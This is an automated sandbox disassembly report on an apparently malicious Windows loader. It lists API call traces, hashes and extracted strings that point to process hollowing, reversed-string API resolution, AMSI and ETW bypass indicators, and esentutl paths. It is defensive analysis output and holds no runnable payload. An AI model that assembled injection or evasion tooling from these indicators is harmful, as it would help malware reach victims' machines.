• Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Execution Graph

Execution Coverage: 10.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 171
Total number of Limit Nodes: 15

Control-flow Graph

• Executed
• Not Executed
31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b894c call 31b8080 call 31b894c * 2 6577->6803 6578->6577 6803->6060
                                                                                              APIs
                                                                                                • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                                • Part of subcall function 031B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031B8814
                                                                                              • GetThreadContext.KERNEL32(032273D4,03227424,ScanString,032273A8,031BA93C,UacInitialize,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,UacInitialize,032273A8), ref: 031B9602
                                                                                                • Part of subcall function 031B8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B8471
                                                                                                • Part of subcall function 031B8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 031B86D5
                                                                                                • Part of subcall function 031B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
                                                                                                • Part of subcall function 031B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
                                                                                              • SetThreadContext.KERNEL32(032273D4,03227424,ScanBuffer,032273A8,031BA93C,ScanString,032273A8,031BA93C,Initialize,032273A8,031BA93C,032273D0,032274C0,032274FC,00000004,03227500), ref: 031BA317
                                                                                              • NtResumeThread.NTDLL(032273D4,00000000), ref: 031BA324
                                                                                                • Part of subcall function 031B894C: LoadLibraryW.KERNEL32(?,?), ref: 031B8960
                                                                                                • Part of subcall function 031B894C: GetProcAddress.KERNEL32(03227394,BCryptVerifySignature), ref: 031B897A
                                                                                                • Part of subcall function 031B894C: FreeLibrary.KERNEL32(03227394,03227394,BCryptVerifySignature,bcrypt,?,032273D4,00000000,032273A8,031BA587,ScanString,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,Initialize), ref: 031B89B6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                              • API String ID: 2388221946-51457883
                                                                                              • Opcode ID: ea155c44fefa12e9cb510e333dceb1d1c72035661fdae7aeb3f290cf497ee968
                                                                                              • Instruction ID: 57ca3a4bd5727792ced5c80215504b909d114afb7b235342262ee6cf0599ba3e
                                                                                              • Opcode Fuzzy Hash: ea155c44fefa12e9cb510e333dceb1d1c72035661fdae7aeb3f290cf497ee968
                                                                                              • Instruction Fuzzy Hash: E8E2E93DA04A589FCB11EB69DC80ACE73B9AF9C601F5041A1E058AF315DF70EE869F51

                                                                                              Control-flow Graph

                                                                                              Control-flow graph of the function at 31b8d6e (blocks 31b8d6e-31ba921); the graph rendering itself is not reproduced here. Windows APIs called directly from this graph: GetThreadContext, SetThreadContext, NtResumeThread. The remaining calls are to internal subroutines, whose APIs are listed under "APIs" below.
                                                                                              APIs
                                                                                                • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                                • Part of subcall function 031B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031B8814
                                                                                              • GetThreadContext.KERNEL32(032273D4,03227424,ScanString,032273A8,031BA93C,UacInitialize,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,UacInitialize,032273A8), ref: 031B9602
                                                                                                • Part of subcall function 031B8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B8471
                                                                                                • Part of subcall function 031B8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 031B86D5
                                                                                                • Part of subcall function 031B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                              • API String ID: 3386062106-51457883
                                                                                              • Opcode ID: 7a8e205e086c546e66d5d3ec26e00943615ec1ca6c86d68583ab672f0414c3c3
                                                                                              • Instruction ID: d07edac37b274b2eee33aac992351979974b763c8d09f9c08dea95b33f256576
                                                                                              • Opcode Fuzzy Hash: 7a8e205e086c546e66d5d3ec26e00943615ec1ca6c86d68583ab672f0414c3c3
                                                                                              • Instruction Fuzzy Hash: 19E2E93DA04A589FCB11FB69DC80ACE73B9AF9C601F5041A1E058AF315DF70EE869B51

                                                                                              Control-flow Graph

                                                                                              Control-flow graph of the function at 31a5acc (blocks 31a5acc-31a5cf9); the graph rendering itself is not reproduced here. Windows APIs called from this graph: GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpyn, GetThreadLocale, GetLocaleInfoA, lstrlen, LoadLibraryExA.
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 031A5AE8
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5B06
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5B24
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 031A5B42
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,031A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 031A5B8B
                                                                                              • RegQueryValueExA.ADVAPI32(?,031A5D38,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,031A5BD1,?,80000001), ref: 031A5BA9
                                                                                              • RegCloseKey.ADVAPI32(?,031A5BD8,00000000,00000000,00000005,00000000,031A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5BCB
                                                                                              • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 031A5BE8
                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 031A5BF5
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 031A5BFB
                                                                                              • lstrlen.KERNEL32(00000000), ref: 031A5C26
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 031A5C6D
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5C7D
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 031A5CA5
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CB5
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CDB
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                              • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                              • API String ID: 1759228003-3917250287
                                                                                              • Opcode ID: d8148d87ee2c0a515ae068f23cae8cc70379e81341baa35d196d89c93d0d005e
                                                                                              • Instruction ID: 17c233aeb6141e72c3cffbd5e9281f1ec72455fa4fbd48f5f743dd8d873040a7
                                                                                              • Opcode Fuzzy Hash: d8148d87ee2c0a515ae068f23cae8cc70379e81341baa35d196d89c93d0d005e
                                                                                              • Instruction Fuzzy Hash: BD510A7DA4475C7FEB20D6AC8C45FEFB7AD9B0D342F1400A2AA40E6185E774DA488B60

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                              • API String ID: 1888340430-445027087
                                                                                              • Opcode ID: 54064e8b438cd3fa95102980866ff54971d03c025b0a0437b5cf234b72961bb3
                                                                                              • Instruction ID: 677f420b566d3d021f455fbcd043bb887972ecb07d9987e889d3052d0c1af553
                                                                                              • Opcode Fuzzy Hash: 54064e8b438cd3fa95102980866ff54971d03c025b0a0437b5cf234b72961bb3
• Instruction Fuzzy Hash: DA111B79204308BFDB14EFA9EC51EEE77BCEB8C610F509460F900DB681DB70AA008B64
APIs
  • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
Similarity
• API ID: AddressProc$AllocateHandleMemoryModuleVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 1888340430-445027087
• Opcode ID: 650208f9fb7737f384f9b95ee23ae72eac3d3b9e51fbd6f81e2d511c5e5a2260
• Instruction ID: 534b1e459e0a4691c05e9b0b94ec3466c0404b61fe973a2e9892b6e9db57c29b
• Opcode Fuzzy Hash: 650208f9fb7737f384f9b95ee23ae72eac3d3b9e51fbd6f81e2d511c5e5a2260
• Instruction Fuzzy Hash: 76111B79204308BFDB14EFA9EC51EDE77BCEB8C610F509460F900DB681DB70AA008B64
APIs
  • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B8471
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
Similarity
• API ID: AddressProc$HandleMemoryModuleReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN
• API String ID: 36784810-737317276
• Opcode ID: 6f506b4f1918ba29deb2adb7a5602aaa93c912758f36452bd2ddfd553575da35
• Instruction ID: 663a6454901d123f7f371abc8bd9592b3db37c57cc6225d7c954f0d77683f560
• Opcode Fuzzy Hash: 6f506b4f1918ba29deb2adb7a5602aaa93c912758f36452bd2ddfd553575da35
• Instruction Fuzzy Hash: 51012579204748BFDB10EFA9EC51E9EB7FCEB4DA10F518460F904DB641DB74A9008B24
APIs
  • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
Similarity
• API ID: AddressProc$HandleMemoryModuleVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW
• API String ID: 1525300337-3542721025
• Opcode ID: 9bc319e14dd53f47f9dfd710c5ed3caf5f0ce65e52359e6496a7c0f6acaeb354
• Instruction ID: 665638c880d765c733a32c6cb6861009aecb0119ea174e03c567516fa8aa8d70
• Opcode Fuzzy Hash: 9bc319e14dd53f47f9dfd710c5ed3caf5f0ce65e52359e6496a7c0f6acaeb354
• Instruction Fuzzy Hash: 34011779204208AFCB10EF99EC56E9E77FCEF8DA00F508460F800DB681DB70AD108B64
APIs
  • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
• NtUnmapViewOfSection.NTDLL(?,?), ref: 031B86D5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
Similarity
• API ID: AddressProc$HandleModuleSectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
• API String ID: 858119152-2520021413
• Opcode ID: ea7716c70fd4a360e324f9277604b52926ca5a4171586a6bde5fbbaf9b47b517
• Instruction ID: 7627684cf1881a41eee6f439946a8d77a8d5ce3cdbbbba385128e1a20d2b0cf2
• Opcode Fuzzy Hash: ea7716c70fd4a360e324f9277604b52926ca5a4171586a6bde5fbbaf9b47b517
• Instruction Fuzzy Hash: E4014F7C604748BFDB10FFA9EC51E9D77BDEB4DA11F518460E4009B641DB74A9008624
APIs
  • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
  • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
• NtUnmapViewOfSection.NTDLL(?,?), ref: 031B86D5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
Similarity
• API ID: AddressProc$HandleModuleSectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
• API String ID: 858119152-2520021413
• Opcode ID: 9ffe1f581c414942d1ee579b17bda99f392349186a162dc794c77935294e9e04
• Instruction ID: 2586d394b4ad182431df35c62aed1a43270eb551266ff0272402be0c04ce34ff
• Opcode Fuzzy Hash: 9ffe1f581c414942d1ee579b17bda99f392349186a162dc794c77935294e9e04
• Instruction Fuzzy Hash: 94F0497CA08388AFCB04FBA9E9459DD77FDEB8DA11B5084A1E4049B245DB30AA01CA10
APIs
• RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 031BDDAB
• NtClose.NTDLL(?), ref: 031BDE25
  • Part of subcall function 031A4C60: SysFreeString.OLEAUT32 ref: 031A4C6E
Memory Dump Source
• Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
Similarity
• API ID: Path$CloseFreeNameName_String
• String ID:
• API String ID: 11680810-0
• Opcode ID: 9f518491777f10014770e7d47fd6e51e3c66cb7a4a06857dbf2a31d7d35ad3ef
• Instruction ID: fb8a940b3a51a6251b6ac1a9e100263a171176dab13389f7b6b35fdb9d350dc9
• Opcode Fuzzy Hash: 9f518491777f10014770e7d47fd6e51e3c66cb7a4a06857dbf2a31d7d35ad3ef
• Instruction Fuzzy Hash: 8521E079A40708BBDB15EAA5DD52FDEB7BCAB4CB00F500461F200FB180DBB4AA048765
APIs
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031B7A9F
Memory Dump Source
• Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 8ae3787e6336354a6937ad59b0e7b1866c475cbf9ab40b85fa9897fa7701db5f
• Instruction ID: da3701ef45564d3bf13b977de219228e5c2f261427621c7322ffd5c202d701b6
• Opcode Fuzzy Hash: 8ae3787e6336354a6937ad59b0e7b1866c475cbf9ab40b85fa9897fa7701db5f
• Instruction Fuzzy Hash: 38F0FE7A508248BFDB45DFA8EC54EEA77ECEB8C710F445466F905C7241E7349A008760
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
Similarity
• API ID: Module$AddressFileHandleNamePathProc$AttributesCheckCloseDebuggerFreeLibraryName_PresentRemote
• String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
• API String ID: 3113829192-2693441831
• Opcode ID: 6cbf28cd662651204e995d3b650e3546993c98ff3ea99fffd3cadc581e24e066
• Instruction ID: 50bf32549dada879fef6d8aefb8c5e9f922426f91fa38ec8417072f41db5834e
• Opcode Fuzzy Hash: 6cbf28cd662651204e995d3b650e3546993c98ff3ea99fffd3cadc581e24e066
• Instruction Fuzzy Hash: 48142E3CA1865C9FCB10EB69DC81ACE73B9AF9D702F1080A59508AF754DF74AE858F41

Control-flow Graph
                                                                                              control_flow_graph 4573 31c8122-31c8517 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a48ec 4688 31c851d-31c86f0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a47ec call 31a49a0 call 31a4d74 call 31a4df0 CreateProcessAsUserW 4573->4688 4689 31c93a1-31c9524 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a48ec 4573->4689 4798 31c876e-31c8879 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 4688->4798 4799 31c86f2-31c8769 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 4688->4799 4779 31c952a-31c9539 call 31a48ec 4689->4779 4780 31c9cf5-31cb2fa call 31a4860 call 31a49a0 
call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 
call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 * 16 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 